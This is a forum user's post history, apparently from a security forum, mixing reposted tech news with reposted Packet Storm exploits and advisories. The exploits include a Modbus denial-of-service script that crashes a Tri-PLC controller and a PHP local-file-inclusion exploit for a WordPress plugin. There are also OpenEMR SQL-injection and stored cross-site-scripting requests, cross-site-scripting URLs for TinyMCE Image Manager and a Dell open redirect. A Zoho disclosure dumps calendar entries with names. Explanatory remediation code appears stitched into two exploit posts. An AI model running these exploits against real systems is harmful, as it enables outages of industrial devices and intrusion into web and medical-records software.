
Matt

Everything posted by Matt

  1. $$$
  2. A Linux developer has blasted the kernel's chief Linus Torvalds, taking him to task for his famous potty mouth and brutal putdowns of his lieutenants. It's time for Torvalds to stop "verbally abusing" his programmers, Sarah Sharp told the fiery Finn, warning him she's "not taking it any more". The USB 3.0 driver maintainer pleaded: "You don't need to SHOUT, call me names, or tell me to SHUT THE FUCK UP!"

     But Torvalds, who founded the popular Linux kernel project in the mid-1990s, wasn't taking this lying down, claiming today's demands of "professionalism" promote passive-aggressive "fake politeness" used by tie-wearing back-stabbers.

     "You are in a position of power. Stop verbally abusing your developers," Sharp hit back at Torvalds on the Linux Kernel Mailing List (LKML) - the nerve-centre of the open-source system's development.

     The catalyst was Torvalds' latest rants over bugs in the x86 updates for the 3.11 kernel that has just hit first release candidate as well as in the 3.10.1 stable review. Things started simmering on Friday, when Torvalds tore into Sharp's kernel boss, USB subsystem maintainer Greg Kroah-Hartman. Torvalds wrote that bugs were getting into the kernel because devs treat Kroah-Hartman like a doormat. "You may need to learn to shout at people," he wrote.

     However, this was playful by Torvalds' standards, and by Saturday Linus had uncorked the vintage Torvalds over problems he'd found in the x86 work on 3.11. Torvalds was very upset after he'd merged the code assuming it was stable when it wasn't.

     Sharp, who runs USB 3.0 support and is the Linux kernel xHCI driver maintainer, has demanded Torvalds stop yelling at devs in caps and be "more professional". Sharp wrote:

     Sharp has called for talks at the next Linux Kernel Summit to improve the working environment on the kernel and to force Torvalds to confront people in person. "We can at least yell at each other in person," Sharp wrote. The kernel dev is also encouraging fellow devs to stand up to Torvalds and call for civility on the LKML.

     I'm not going to wear ties, buy into fake politeness - Torvalds

     But the angry Finn isn't backing down and Torvalds hasn't taken criticism of his management style in silence. In an increasingly lengthy and fiery series of LKML exchanges with Sharp, he fired back arguing he can't help himself and it's his management style to be "honest" and "emotional".

     Torvalds responded to Sharp's calls for greater professionalism by saying she's trying to force her own style on him. She reckoned he should be running the project by setting rules on code quality and working with other managers to discipline devs who submit the kinds of bugs that typically send him off into orbit. "If they protest, then lay into them," she said.

     But, no, that's not Torvalds' style. "I'm not going to start wearing ties, I'm *also* not going to buy into the fake politeness, the lying, the office politics and backstabbing, the passive aggressiveness, and the buzzwords. Because THAT is what 'acting professionally' results in," he said. Indeed, Torvalds reckons, "publicly tearing apart" members of the Linux project is the only way to get results.

     Sharp headed this off, saying Torvalds is capable of being polite – he just doesn't want to bother. On Monday, as part of her back and forth with Torvalds, Sharp wrote:

     Source: TheRegister.co.uk
  3. A TARGETED ATTACK launched against European government agencies has been uncovered by security company Trend Micro, which warned of its ability to steal login credentials from Internet Explorer (IE) and Microsoft Outlook.

     The attack takes advantage of a vulnerability in Microsoft Office and was launched in the form of an email claiming to be from the Chinese Ministry of National Defense, although Trend Micro said it appeared to have been sent from a Gmail account and did not use a Chinese name. The email contained a malicious Microsoft Word attachment that exploits vulnerability CVE-2012-0158 in all versions of Microsoft Office 2003 to Microsoft Office 2010, despite having been patched by Microsoft over a year ago.

     "The exploit is used to drop a backdoor onto the system, which steals login credentials for websites and email accounts from Internet Explorer and Microsoft Outlook," Trend Micro's Jonathan Leopando said in a blog post on Monday. "It also opens a legitimate 'dummy' document, to make the target believe that nothing malicious happened. Any stolen information is then uploaded to two IP addresses, both of which are located in Hong Kong."

     The security firm said that the attack was aimed at personnel working for both European and Asian governments, and was sent to at least 16 officials representing European countries. The attackers made it more likely that the document would be opened by the targets by ensuring the topic of the email would be of interest to them.

     "In addition, the information stolen and where it was stolen from - is very consistent with targeted attacks aimed at large organizations that use corporate mainstays like Internet Explorer and Outlook," Trend Micro added.

     Though the email claims to be from the Chinese Ministry of National Defense, it was found that Chinese media organisations were also targeted in the attack, so it is unclear where the attack actually came from.

     Trend Micro said that its products already detect all aspects of this threat, with the message and C&C servers being blocked, and the malicious attachment detected as TROJ_DROPPER.IK and the backdoor itself as BKDR_HGDER.IK.

     Source: TheInquirer.net
  4. South Korea has accused the North Korean government of being behind a wave of cyber attacks on the country's networks.

     The Ministry of Science, ICT and Future Planning reported uncovering evidence linking the North Korean government to the signature malicious computer codes and an internet address used in the attacks mounted on the anniversary of the Korean War last month, in a report published Tuesday. The campaign saw hackers target several government websites with denial of service (DoS) and defacement attacks. The attackers claimed to be operating as independent hacktivists, though this has been questioned.

     Most recently security firm McAfee reported uncovering evidence suggesting that the attacks are part of a larger, sophisticated spying campaign that has been active since at least 2009, in its Dissecting Operation Troy: Cyber espionage in South Korea threat report. Like the Ministry, the report cited similarities between the DarkSeoul attacks and malware used by a second team, operating under the New Romanic Cyber Army Team alias, as proof that the use of the Anonymous hacktivist banner was likely a smokescreen designed to fool law enforcement and governments about the true nature of the campaign. However, unlike the Ministry, McAfee said even with this evidence it is still too early to know whether the North Korean government is behind the attacks.

     Prior to the attacks on the government, DarkSeoul hackers also mounted sophisticated cyber attacks on several of the country's banks and broadcasters, crippling thousands of computers. This has increased political tensions between the North and South Korean governments, leading many security researchers to fear potential repercussions.

     Source: TheRegister.co.uk
  5. 4. Some categories have their own internal rules. Check whether there is a sticky rules thread before posting in a given category. This applies in particular to the categories "CERERI" (minimum 10 QUALITY posts), "AJUTOR" (minimum 10 QUALITY posts) and "Bloguri și Bloggeri" (minimum 50 QUALITY posts). Respect this rule!!
  6. That topic is full of spam and crap posts that are useless. It seems normal to me that you got a warn. You started from an XSS and ended up at Salvation.
  7. Description : Tri-PLC Nano-10 r81 suffers from a denial of service vulnerability.
     Author : Sapling
     Source : Tri-PLC Nano-10 r81 Denial Of Service - Packet Storm
     Code :

     # Exploit Title: Tri-PLC Nano-10 DoS
     # Date: 07/11/2013
     # Exploit Author: Sapling
     # Vendor Homepage: www.tri-plc.com
     # Version: Firmware Version r81 and prior
     # CVE : CVE-2013-2784
     # ICSA: ICSA-13-189-02

     # The vulnerability exists due to a flaw in the PLC's ability to handle a
     # Modbus packet with the bit quantity of coils set to 0. When sending this
     # malformed packet the device crashes and fails to recover without manual
     # intervention. Once an engineer manually reboots the device it will recover
     # from the crash.
     #
     # In order to minimize the risk of this attack the Modbus access control list
     # can be used to limit the IP addresses that can connect to the device.
     # Additionally, limiting this device to segmented internal networks is advised
     # and blocking port TCP 502 at the gateway.
     #
     # Note: I believe the device is also vulnerable to the same vulnerability when
     # executing writes as well, but most write functions are going to be limited
     # on devices, or at least more so than reads would be.
     #
     # Finally, I take no responsibility for how or where you use this proof of
     # concept code and remind you to be responsible.

     # Python proof of concept
     # For those more interested in the value meanings:
     # Starting from the \x06 byte and down being the more important pieces
     # \x06      length
     # \x01      unit id
     # \x01      function code (read coils)
     # \x00\x00  start address
     # \x00\x00  coil quantity
     import sys
     import socket

     new = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     new.connect(('192.168.1.12', 502))  # Change the IP address to your PLC IP Address
     new.send('\x00\x01\x00\x00\x00\x06\x01\x01\x00\x00\x00\x00')
  8. Description : WordPress Spicy Blogroll plugin suffers from a local file inclusion vulnerability.
     Author : Ahlspiess
     Source : WordPress Spicy Blogroll Local File Inclusion - Packet Storm
     Code :

     <?php
     // Title: Wordpress Plugin Spicy Blogroll File Inclusion Vulnerability
     // Date: 12-07-2013 (GMT+8 Kuala Lumpur)
     // Author: Ahlspiess
     // Greetz: All TBDIAN - http://w3.tbd.my
     // Screenshot: http://i.imgur.com/jIrUznC.png

     /**
     Details:
     File: /wp-content/plugins/spicy-blogroll-ajax.php
     SVN Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll-ajax.php

     <?php
     ...
     ...
     $link_url = $_GET['link_url'];
     $link_text = $_GET['link_text'];
     $var2 = unscramble($_GET['var2']);
     $var3 = unscramble($_GET['var3']);
     $var4 = unscramble($_GET['var4']);
     $var5 = unscramble($_GET['var5']);
     $nonce = unscramble($_GET['var11']);
     require_once($var2.$var4); <-- Boom
     ...
     ...
     */

     if(!isset($argv[3])) {
         die(sprintf("php %s <host> <path> <file>\n", $argv[0]));
     }

     list(,$host, $path, $file) = $argv;

     $vfile = 'http://%s%s/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=%s&var4=%s';
     $request = sprintf($vfile, $host, $path, scramble(dirname($file) . "/"), scramble(basename($file)));

     $opts = array(
         'http' => array(
             'header' => "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0",
             'ignore_errors' => true,
         )
     );
     $context = stream_context_create($opts);
     echo file_get_contents($request, 0, $context);

     /**
     Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll.php
     Line: 386-401
     */
     function scramble($text1, $rng = 1) {
         $len = strlen($text1);
         $rn = $rng % 2;
         $count = 7;
         $seed = ($rn %= 2) + 1;
         $text2 = chr($seed + 64 + $rng) . chr($rng + 70);
         for ($i = 0; $i <= $len - 1; $i++) {
             $seed *= -1;
             $count += 1;
             $ch = ord(substr($text1, $i, 1)) + $seed;
             if ($ch == 92) { $ch .= 42; }
             $text2 .= chr($ch);
             if ($count % 5 == $rn) { $text2 .= chr(mt_rand(97, 123)); }
         }
         return $text2;
     }
     ?>
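     The root cause in the plugin code quoted above is `require_once($var2.$var4)`: the directory and file name come straight from the request, and `scramble()` is reversible obfuscation rather than any kind of authorization, so it adds nothing. The following is an added example of the check that is missing; it is not the plugin's code and not the PoC author's, and it is written in Python rather than PHP so that it runs stand-alone. The plugin directory path and the allowlist of includable file names are assumptions made up for the example; the containment check itself is the general rule (resolve the candidate path, then refuse anything that resolves outside the directory the include is meant to live in, or that names a stream wrapper).

```python
import posixpath

# Assumed install location of the plugin (constructed for the example).
PLUGIN_DIR = "/var/www/wp-content/plugins/spicy-blogroll"

# Assumed allowlist of files the AJAX handler may legitimately include.
ALLOWED_INCLUDES = {"spicy-blogroll-ajax-helper.php", "spicy-blogroll-view.php"}


def resolve_include(base_dir: str, directory_part: str, file_part: str) -> str:
    """Safe counterpart of require_once($var2.$var4).

    Returns the absolute path to include, or raises ValueError with the reason
    the request was refused. Checks are ordered so that the cheapest, most
    decisive rejections come first.
    """
    joined = directory_part + file_part
    if "\x00" in joined:
        raise ValueError("NUL byte in path")
    # php://, data://, http:// etc. would turn a local include into a remote one.
    if "://" in joined:
        raise ValueError("stream wrapper or remote include rejected")
    # Resolve relative to the plugin directory and collapse any ../ segments.
    # An absolute directory_part makes posixpath.join discard base_dir, which
    # the containment check below then catches.
    candidate = posixpath.normpath(posixpath.join(base_dir, joined))
    if candidate != base_dir and not candidate.startswith(base_dir + "/"):
        raise ValueError("path escapes plugin directory")
    if posixpath.basename(candidate) not in ALLOWED_INCLUDES:
        raise ValueError("file not on include allowlist")
    return candidate


def check_include(base_dir: str, directory_part: str, file_part: str) -> str:
    """Wrapper that reports the verdict as a string, for logging or tests."""
    try:
        return "ok: " + resolve_include(base_dir, directory_part, file_part)
    except ValueError as exc:
        return "rejected: " + str(exc)


if __name__ == "__main__":
    # Constructed requests: one legitimate, the rest of the shape the PoC sends.
    samples = [
        ("", "spicy-blogroll-ajax-helper.php"),
        ("sub/../", "spicy-blogroll-view.php"),
        ("../../../../etc/", "passwd"),
        ("/etc/", "passwd"),
        ("php://filter/convert.base64-encode/resource=", "wp-config.php"),
        ("", "wp-config.php"),
    ]
    for directory_part, file_part in samples:
        print(f"{directory_part!r} + {file_part!r} -> {check_include(PLUGIN_DIR, directory_part, file_part)}")
```

     Two design notes. The check is lexical (`normpath`), which is enough to demonstrate containment; on a real filesystem you would resolve with `os.path.realpath` after the lexical check so that symlinks inside the plugin directory cannot point back out. And the allowlist is what actually closes the hole: path containment alone would still let a request include any PHP file under the plugin directory, which is rarely what the handler intends.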
  9. Description : OpenEMR versions 4.1.1 patch-12 and below suffer from cross site scripting and remote SQL injection vulnerabilities.
     Author : Nate Drier
     Source : OpenEMR 4.1.1 patch-12 Cross Site Scripting / SQL Injection - Packet Storm
     Code :

     Trustwave SpiderLabs Security Advisory TWSL2013-018:
     Multiple Vulnerabilities in OpenEMR

     Published: 07/12/13
     Version: 1.0

     Vendor: OEMR (www.open-emr.org)
     Product: OpenEMR
     Version affected: 4.1.1 patch-12 and prior

     Product description:
     OpenEMR is an ONC-ATB Ambulatory EHR 2011-2012 certified electronic health records and medical practice management application. It features fully integrated electronic health records, practice management, scheduling, and electronic billing.

     Finding 1: SQL Injection
     Credit: Nate Drier of Trustwave SpiderLabs
     CVE: CVE-2013-4619
     CWE: CWE-89

     Several locations in the authenticated portion of OpenEMR do not properly sanitize input. As any user (from Administrator to Front Desk), SQL statements can be injected into the application in the following locations:

     1. Reports > Visits > SuperBill > Dates ('start' and 'end' parameters are vulnerable with a POST to /openemr-4.1.1/interface/reports/custom_report_range.php)

     #Request
     POST http://a.b.c.d/openemr-4.1.1/interface/reports/custom_report_range.php HTTP/1.1
     Host: a.b.c.d
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Proxy-Connection: keep-alive
     Referer: http://a.b.c.d/openemr-4.1.1/interface/reports/custom_report_range.php
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 52

     form_refresh=true&start=2013-01-07&end=2013-02-06'INJECT

     #Response
     <snip>
     <p><p><font color='red'>ERROR:</font> query failed: select * from forms where form_name = 'New Patient Encounter' and date between '2013-01-07' and '2013-02'-06' order by date DESC<p>Error: <font color='red'>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by date DESC' at line 1</font><p>
     <snip>

     2. Misc > Chart Tracker ('form_newid' parameter is vulnerable with a POST to /openemr-4.1.1/custom/chart_tracker.php)

     #Request
     POST http://a.b.c.d/openemr-4.1.1/custom/chart_tracker.php HTTP/1.1
     Host: a.b.c.d
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Proxy-Connection: keep-alive
     Referer: http://a.b.c.d/openemr-4.1.1/custom/chart_tracker.php
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 34

     form_newid=test'INJECT&form_lookup=Look+Up

     #Response
     <snip>
     <p><p><font color='red'>ERROR:</font> query failed: SELECT pd.pid, pd.pubpid, pd.fname, pd.mname, pd.lname, pd.ss, pd.DOB, ct.ct_userid, ct.ct_location, ct.ct_when FROM patient_data AS pd LEFT OUTER JOIN chart_tracker AS ct ON ct.ct_pid = pd.pid WHERE pd.pubpid = 'test'INJECT' ORDER BY pd.pid ASC, ct.ct_when DESC LIMIT 1<p>
     <snip>

     Finding 2: HTML / Script Injection (Persistent XSS)
     Credit: Nate Drier of Trustwave SpiderLabs
     CVE: CVE-2013-4620
     CWE: CWE-79

     The 'Office Notes' section of OpenEMR allows users of the application to submit notes for other users. This input is not sanitized, and HTML can be injected into the notes application and saved. Basic XSS works (alerts, document.cookie, etc). Useful in a pentest, UNC paths can also be saved as a note, and any user viewing the notes will attempt to authenticate to the UNC share location.

     1. Misc > Office Notes ('note' parameter is vulnerable with a POST to /openemr-4.1.1/interface/main/onotes/office_comments_full.php)

     #Request:
     POST http://a.b.c.d/openemr-4.1.1/interface/main/onotes/office_comments_full.php HTTP/1.1
     Host: a.b.c.d
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Proxy-Connection: keep-alive
     Referer: http://a.b.c.d/openemr-4.1.1/interface/main/onotes/office_comments_full.php
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 43

     mode=new&offset=0&active=all&note=<script>alert(document.cookie)</script>

     #Response:
     <snip>
     <tr><td><input type=hidden value='' name='act115' id='act115'><input name='box115' id='box115' onClick='javascript:document.update_activity.act115.value=this.checked' type=checkbox checked></td><td><label for='box115' class='bold'>Wed February 06th</label> <label for='box115' class='bold'>(test)</label></td><td><label for='box115' class='text'><script>alert(document.cookie)</script> </label></td></tr>
     <snip>

     Remediation Steps:
     The vendor has released the 4.1.1 patch to address these vulnerabilities. All versions need to be upgraded to version 4.1.1 in order to apply the patch.

     Revision History:
     06/03/13 - Vulnerability disclosed
     06/14/13 - Patch released by vendor
     07/12/13 - Advisory published

     References
     1. http://www.open-emr.org/wiki/index.php/OpenEMR_Patches

     About Trustwave:
     Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions.
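     Both findings in the advisory have the same shape: a request parameter is pasted into a string that a downstream interpreter (MySQL for the report query, the browser for the office note) then parses. The following is an added example, not OpenEMR's code and not Trustwave's, showing the two fixes side by side with the advisory's own test inputs: the `custom_report_range.php` date query rebuilt first by string formatting and then with bound parameters plus input validation, and the office-note rendering with output encoding. SQLite stands in for MySQL here so the block runs offline (an assumption; the injection behaviour on the quote character is the same), and the `forms` table rows are constructed.

```python
import html
import sqlite3
from datetime import datetime

# Test inputs copied from the advisory.
INJECT_DATE = "2013-02-06'INJECT"                          # the 'end' parameter
XSS_NOTE = "<script>alert(document.cookie)</script>"       # the 'note' parameter


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the OpenEMR 'forms' table with constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE forms (form_name TEXT, date TEXT)")
    con.executemany(
        "INSERT INTO forms VALUES (?, ?)",
        [("New Patient Encounter", "2013-01-15"),
         ("New Patient Encounter", "2013-03-01")],
    )
    return con


def visits_unsafe(con, start: str, end: str) -> list:
    """The vulnerable pattern: request values interpolated into SQL text."""
    sql = ("select * from forms where form_name = 'New Patient Encounter' "
           f"and date between '{start}' and '{end}' order by date DESC")
    return con.execute(sql).fetchall()


def parse_date(value: str) -> str:
    """Accept only YYYY-MM-DD; anything else (including the PoC input) is an error."""
    return datetime.strptime(value, "%Y-%m-%d").strftime("%Y-%m-%d")


def visits_safe(con, start: str, end: str) -> list:
    """The fix: validate the shape of the input, then bind it as a parameter.

    Either measure alone would stop this particular payload; both together
    mean a future change to one of them does not reopen the hole.
    """
    start, end = parse_date(start), parse_date(end)
    sql = ("select * from forms where form_name = 'New Patient Encounter' "
           "and date between ? and ? order by date DESC")
    return con.execute(sql, (start, end)).fetchall()


def render_note(note: str) -> str:
    """Office-note cell from the advisory's response, with the text HTML-encoded."""
    return f"<label class='text'>{html.escape(note, quote=True)}</label>"


def demo() -> tuple:
    """Run the advisory's inputs through the vulnerable and the fixed code paths."""
    con = make_db()
    try:
        visits_unsafe(con, "2013-01-07", INJECT_DATE)
        unsafe = "query ran"
    except sqlite3.OperationalError:
        unsafe = "syntax error"          # the database saw the quote as SQL
    try:
        visits_safe(con, "2013-01-07", INJECT_DATE)
        safe = "query ran"
    except ValueError:
        safe = "rejected by date validation"
    rows = visits_safe(con, "2013-01-07", "2013-02-06")
    return unsafe, safe, rows, render_note(XSS_NOTE)


if __name__ == "__main__":
    for label, result in zip(("unsafe path", "safe path", "safe rows", "rendered note"), demo()):
        print(f"{label}: {result}")
```

     The syntax error in the unsafe path is the same symptom the advisory's response shows (`query failed: ... near '' order by date DESC'`), and it is also the detection opportunity: a database error surfacing from a request parameter is worth alerting on even before the root cause is found.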
  10. Description : TinyMCE Image Manager versions 1.1 and below suffer from cross site scripting and content spoofing vulnerabilities.
      Author : MustLive
      Source : TinyMCE Image Manager 1.1 Cross Site Scripting - Packet Storm
      Code :

      Hello list!

      These are Cross-Site Scripting and Content Spoofing vulnerabilities in TinyMCE Image Manager plugin for TinyMCE.

      -------------------------
      Affected products:
      -------------------------

      Vulnerable are TinyMCE Image Manager 1.1 and previous versions.

      -------------------------
      Affected vendors:
      -------------------------

      Dustweb
      http://dustweb.ru/projects/tinymce_images/

      ----------
      Details:
      ----------

      Cross-Site Scripting (WASC-08):

      http://site/path/images/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

      http://site/path/images/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

      Content Spoofing (WASC-12):

      http://site/path/images/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

      http://site/path/images/js/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif

      ------------
      Timeline:
      ------------

      2013.05.18 - announced at my site.
      2013.05.18 - informed developer.
      2013.07.12 - disclosed at my site (http://websecurity.com.ua/6517/).

      Best wishes & regards,
      MustLive
      Administrator of Websecurity web site
      http://websecurity.com.ua
  11. Description : Dell.com suffers from an open redirection vulnerability.
      Author : GoMeR-12
      Source : Dell.com Open Redirection - Packet Storm
      Code :

      [#] Title: Dell Open URL Redirection Vulnerability
      [#] Status: Unfixed
      [#] Severity: High
      [#] Works on: Any browser with any version
      [#] Homepage: www.Dell.com
      [#] Author: GoMeR-12
      [#] Email: gomer12@gmail.com

      Description:
      I have found Open URL Redirection Vulnerabilities in Dell's dialogs. This vulnerability is exploitable for all users, using the "RouteTo" parameter:

      http://www.dell.com/support/contents/us/en/19/RouteTo?SourceUrl=http://google.co.il
  12. Description : Zoho suffers from information disclosure due to a lack of a content-type being specified and also appears to use mixed content.
      Author : Juan Carlos Garcia
      Source : Zoho Information Disclosure / Mixed Content - Packet Storm
      Code :

      ZOHO INTERNAL INFORMATION DISCLOSURE - Content type is not specified / INSECURE TRANSITION FROM HTTP TO HTTPS IN FORM
      ==================================================================================================================================================

      Report-Timeline:
      ================
      2013-07-01: Researcher Notification
      2013-07-02: RESPONSE
      2013-07-05: Ask About the issues
      2013-07-06: Vendor Feedback
      2013-07-10: Not Fixed
      2013-07-12: Full Disclosure

      I-VULNERABILITIES
      ======================
      #Title: ZOHO INTERNAL INFORMATION DISCLOSURE - Content type is not specified / INSECURE TRANSITION FROM HTTP TO HTTPS IN FORM
      #Vendor: https://www.zoho.com
      #Author: Juan Carlos García (@secnight)
      #Follow me
       http://www.highsec.es
       http://hackingmadrid.blogspot.com
       Twitter: @secnight

      II-Introduction:
      ======================
      1- To date, Zoho.com has launched 25+ online applications — from CRM to Mail, Office Suite, Project Management, Invoicing, Web conferencing and more. Zoho has received numerous awards, including an InfoWorld 2009 "Product of the Year" award, a 2008 PC World "25 Most Innovative Products Award" and a 2007 TechCrunch "Best Enterprise Start-up." Zoho uses an open application programming interface for its Writer, Sheet, Show, Creator, Meeting, and Planner products. It also has plugins into Microsoft Word and Excel, an OpenOffice.org plugin, and a plugin for Firefox. More than 8 Million users Work Online with Zoho

      2- Components
      2.1 Zoho Writer
      2.2 Zoho Sheet
      2.3 Zoho Reports
      2.4 Zoho Show
      2.5 Zoho Projects
      2.6 Zoho BugTracker
      2.7 Zoho CRM
      2.8 Zoho Invoice
      2.9 Zoho Creator
      2.10 Zoho Wiki
      2.11 Zoho Discussions
      2.12 Zoho Planner
      2.13 Zoho Notebook
      2.14 Zoho Chat
      2.15 Zoho Mail
      2.16 Zoho Meeting
      2.17 Zoho People
      2.18 Zoho Books
      2.19 Zoho Docs

      III-PROOF OF CONCEPT
      ======================

      INTERNAL INFORMATION DISCLOSURE - Content type is not specified -
      ==============================================================
      This page doesn't set a Content-Type header value. This value informs the browser what kind of data to expect. If this header is missing, the browser may incorrectly handle the data. This could lead to security problems.

      This vulnerability affects /creator/help/images/contacts.ds.

      /*
       * Author : latha
       * Generated on : 02-Nov-2012 14:53:52
       * Version : 3.0
       */
      application "Contacts"
      {
          allow html = true
          date format = "dd-MMMM-yyyy"
          time zone = "America/Los_Angeles"
          section Home
          {
              form Contacts_Form
              {
                  displayname = "Contacts Form"
                  captcha = true
                  success message = "Data Added Successfully!"
                  field alignment = left
                  column
                  {
                      EmpName ( type = text  tooltip = "Web application"  width = 200px )
                      Number_1 ( displayname = "Number 1"  type = number  maxchar = 2  width = 100px )
                      Email_ID ( displayname = "Email ID"  type = email  tooltip = "Web application"  width = 200px )
                      Contact ( type = decimal  maxchar = 99  tooltip = "Web application"  width = 100px )
                      DOB ( type = date  tooltip = "Web application"  width = 130px )
                      Country ( type = text  tooltip = "Web application"  width = 200px )
                  }
                  column
                  {
                      Currency_1 ( displayname = "Currency 1"  type = USD  maxchar = 2  width = 100px )
                  }
                  actions
                  {
                      on add
                      {
                          Submit ( type = submit  displayname = "Submit" )
                          Reset ( type = reset  displayname = "Reset" )
                      }
                      on edit
                      {
                          Update ( type = submit  displayname = "Update" )
                          Cancel ( type = cancel  displayname = "Cancel" )
                      }
                  }
              }
              list Contacts_Form_View
              {
                  displayname = "Contacts Form View"
                  show all rows from Contacts_Form
                  (
                      EmpName as "Name"
                      Email_ID as "Email ID"
                      Contact, display total
                      DOB
                      Country
                      Number_1 as "Number 1"
                      Currency_1 as "Currency 1"
                  )
                  filters ( DOB )
              }
          }
      }

      /creator/help/images/ical-feed1.ds.
      BEGIN:VCALENDAR
      PRODID:-//ZOHO Creator//iCal Feed//EN
      VERSION:2.0
      CALSCALE:GREGORIAN
      X-WR-TIMEZONE:UTC
      X-WR-CALNAME:ICal_View
      BEGIN:VEVENT
      DTSTAMP:20121121T115822Z
      SUMMARY:My B`day
      DTEND;VALUE=DATE:20120417
      ORGANIZER;CN=Test 2:
      LOCATION:Chennai
      STATUS:confirmed
      DTSTART;VALUE=DATE:20120417
      CLASS:PUBLIC
      UID:1040582/ical-application/ICal_View/204098000002226173/@zohocreator.com
      END:VEVENT
      BEGIN:VEVENT
      DTSTAMP:20121121T115822Z
      SUMMARY:Meet test
      DTEND;VALUE=DATE:20120218
      ORGANIZER;CN=Test 1:
      LOCATION:Chennai
      STATUS:confirmed
      DTSTART;VALUE=DATE:20120215
      CLASS:PUBLIC
      UID:1040582/ical-application/ICal_View/204098000002226169/@zohocreator.com
      END:VEVENT
      BEGIN:VEVENT
      DTSTAMP:20121121T115822Z
      SUMMARY:Rozden Den
      DTEND:20100429T055909
      ORGANIZER;CN=Tatka:
      LOCATION:Aprilovo
      STATUS:confirmed
      DTSTART:20100428T205905
      CLASS:PUBLIC
      UID:1040582/ical-application/ICal_View/204098000001243011/@zohocreator.com
      END:VEVENT
      BEGIN:VEVENT
      DTSTAMP:20121121T115822Z
      SUMMARY:Summ
      DTEND;VALUE=DATE:20100426
      ORGANIZER;CN=Hristo:
      LOCATION:Btv
      STATUS:tentative
      DTSTART;VALUE=DATE:20100426
      CLASS:PRIVATE
      UID:1040582/ical-application/ICal_View/204098000001243007/@zohocreator.com
      END:VEVENT
      BEGIN:VEVENT
      DTSTAMP:20121121T115822Z
      SUMMARY:No summary
      DTEND:20100426T144354
      ORGANIZER;CN=Stefan Stoychev:
      LOCATION:Here
      STATUS:tentative
      DTSTART:20100425T204350
      CLASS:PUBLIC
      UID:1040582/ical-application/ICal_View/204098000001243003/@zohocreator.com
      END:VEVENT
      BEGIN:VEVENT
      DTSTAMP:20121121T115822Z
      SUMMARY:Week end trip
      DTEND;VALUE=DATE:20090921
      ORGANIZER;CN=Stephen:
      LOCATION:New york
      STATUS:confirmed
      DTSTART;VALUE=DATE:20090919
      CLASS:PRIVATE
      UID:1040582/ical-application/ICal_View/204098000000601326/@zohocreator.com
      END:VEVENT
      BEGIN:VEVENT
      DTSTAMP:20121121T115822Z
      SUMMARY:Public sector meeting
      DTEND:20090910T143000
      ORGANIZER;CN=John:
      LOCATION:US
      STATUS:confirmed
      DTSTART:20090910T113000
      CLASS:PUBLIC
      UID:1040582/ical-application/ICal_View/204098000000601322/@zohocreator.com
      END:VEVENT
      END:VCALENDAR
      /creator/help2/images/ical-feed1.ds.
      (Serves the same VCALENDAR feed as /creator/help/images/ical-feed1.ds above: the same PRODID, X-WR-CALNAME and the same seven VEVENT entries with identical UIDs, organizers, locations and dates.)

      /creator/help2/images/contacts.ds.
      (Serves the same "Contacts" application definition as /creator/help/images/contacts.ds above: author latha, generated 02-Nov-2012 14:53:52, version 3.0, with the same Contacts_Form fields, actions and Contacts_Form_View list.)

      INSECURE TRANSITION FROM HTTP TO HTTPS IN FORM
      ================================================
      This form is served from an insecure (http) page. This page could be hijacked using a Man-in-the-middle attack and an attacker can replace the form target.

      (Too Many Affected Items ...
)

Examples:
/announcements/blog/2009-webware-100-awards-vote-for-zoho.html
/announcements/blog/add-footnotes-endnotes-to-your-zoho-writer-documents.html
/announcements/blog/adventnet-inc-is-now-zoho-corporation.html
/announcements/blog/a-faster-way-to-file-bugs-in-bugtracker.html
/announcements/blog/a-million-toons-at-toondoo.html
/announcements/blog/annnouncing-zoho-business.html
/announcements/blog/announcement-zoho-forums-migration.html
/announcements/blog/announcing-the-do-it-yourself-dabble-db-migration-tool.html
/announcements/blog/announcing-zoho-discussions.html
/announcements/blog/announcing-zoholics-zoho-user-conference.html
/announcements/blog/announcing-zoho-meeting.html
/announcements/blog/announcing-zoho-notebook.html
/announcements/blog/announcing-zoho-pulse-a-private-social-network-for-your-business.html
/announcements/blog/announcing-zoho-show-20.html
/announcements/blog/announcing-zoho-support-web-based-help-desk-software-ticket-management-and-self-service-portal.html
/announcements/blog/announcing-zoho-survey-easily-create-professional-surveys-collect-data-and-make-smarter-decisions.html
/announcements/blog/automatic-payment-reminders-for-invoices.html
/announcements/blog/baihui-distributes-zoho-apps-in-china.html
/announcements/blog/barcamp-at-chennai.html
/announcements/blog/berryforms-esurvey-integrates-zoho-reports.html
/announcements/blog/better-import-and-embed-options-in-zoho-show.html
